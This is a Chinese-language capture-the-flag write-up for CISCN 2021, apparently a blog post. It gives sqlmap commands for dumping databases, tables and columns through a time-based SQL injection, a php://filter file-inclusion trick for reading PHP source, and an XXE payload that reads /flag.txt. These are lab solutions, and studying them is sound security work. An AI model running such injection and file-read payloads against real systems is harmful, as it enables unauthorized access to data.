CISCN2021-wp

Posted 2021-06-27 走在安全道路上

前言

这次比赛让我看到只学习一门方向的痛苦。web平台修复，队友在疯狂做题，你却只能在旁边看着却不能帮助。有些题就是悍得悍死，捞得捞死。

Web

简单的注入

一道延时注入，我却在反复测试是否为联合还是其他注入，尝试fuzz，手工注入真的菜。

还是得靠sqlmap注入
Payload：

爆库：sqlmap.py –r txt –risk=3 --level=3 –p password –dbs
爆表：sqlmap.py –r txt –risk=3 –-level=3 –p password –D “数据库名” –-tables
爆列：sqlmap.py –r txt –risk=3 –level=3 –p password –D “数据库名” –T “数据表名” –-columns

Be_Careful

还是做题太少，不能一下子秒掉。

一道伪协议题，url显示file=1.php,尝试查看源码，filter协议查看index得到源码

Be Careful';} $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,'F14ggg.php')||stristr($file,"input")||stristr($file,"data")){ echo "I advise you to do good!"; exit(); } include($file); //real_flag.php ?>

再用base64对real_flag.php进行编码，得到real_flag.php的源码。

/**include('F14ggg.php');
$a = $_GET['a'];
$one = ord('1'); //49
$nine = ord('9'); //57
$number = '69563214562';
for ($i = 0; $i < strlen($number); $i++){
	$digit = ord($a{$i}); echo $digit;
if( ($digit >= $one) && ($digit <= $nine) )
{echo 'wrong';}
elseif($number == $a){echo $flag;
?>**/

所以将number的数转16进制

Payload：

url/real_flag.php?a=0x10324a6ae2

flagin

一道XXE外部漏洞的题，源题。
可以转载到该网址做这道题，只不过加了waf。
原题
利用师傅Payload，往XXE外部增加伪协议。

<!DOCTYPE ANY [
    ​<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/flag.txt"
]>
<user><username>&test;</username><password>123</password></user>

Misc

签到_misc

直接利用exe扫码，得到flag

Crypto

Sign me up

一大串编码，看到后面==，一直进行base64解码得到flag

总结

知不足，然后自反也